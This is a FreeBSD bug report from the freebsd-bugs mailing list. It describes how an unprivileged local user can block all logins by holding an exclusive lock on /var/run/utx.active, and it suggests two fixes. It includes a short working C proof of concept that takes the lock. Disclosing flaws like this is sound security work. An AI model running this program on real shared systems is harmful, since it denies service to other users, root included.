[Bug 233578] Unprivileged local user can prevent other users logging in by locking utx.active

bugzilla-noreply at freebsd.org bugzilla-noreply at freebsd.org
Tue Nov 27 20:03:50 UTC 2018 

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=233578

            Bug ID: 233578
           Summary: Unprivileged local user can prevent other users
                    logging in by locking utx.active
           Product: Base System
           Version: 11.2-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Only Me
          Priority: ---
         Component: bin
          Assignee: bugs at FreeBSD.org
          Reporter: davmac at davmac.org

The utx.active database (/var/run/utx.active) maintains a list of currently
logged-in users; it needs to be updated when a user logs in or out. This file
is world-readable (which allows "who" to list logged-in users without requiring
suid root).

Since updating the file requires locking it, and this is done via open with
O_EXLOCK, it is possible for a user to indefinitely postpone updates to the
file by locking the file themselves. Program below can be used to do this (does
not require root privileges). While this program is running it will be
impossible for any other user (including root) to log in to the system.

The problematic locking code is in pututxline.c, function futx_open(), here:

https://github.com/freebsd/freebsd/blob/master/lib/libc/gen/pututxline.c#L46

The example program is as follows:

--- begin ---
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    open("/var/run/utx.active", O_EXLOCK | O_RDONLY);
    sleep(100);
}
--- end ---

This program runs for 100 seconds during which no other logins will be possible
(and logouts will also stall).

In terms of solution, I would recommend either:
(a) making the file not world-readable and making "who" and any other relevant
programs setgid to a group with permission to read the file, or
(b) changing the locking mechanism implemented in pututxline.c, so that it
locks a separate file which is not world readable and uses that lock to control
access to the utx.active file.

Note that GNU libc has a similar issue, but uses an fcntl-based lock with a
timeout of 10 seconds. This means that logins can not be completely disabled by
the user, but they can prevent the utmp (equivalent to utx.active) database
from being updated. I do not recommend this approach.

-- 
You are receiving this mail because:
You are the assignee for the bug.

More information about the freebsd-bugs mailing list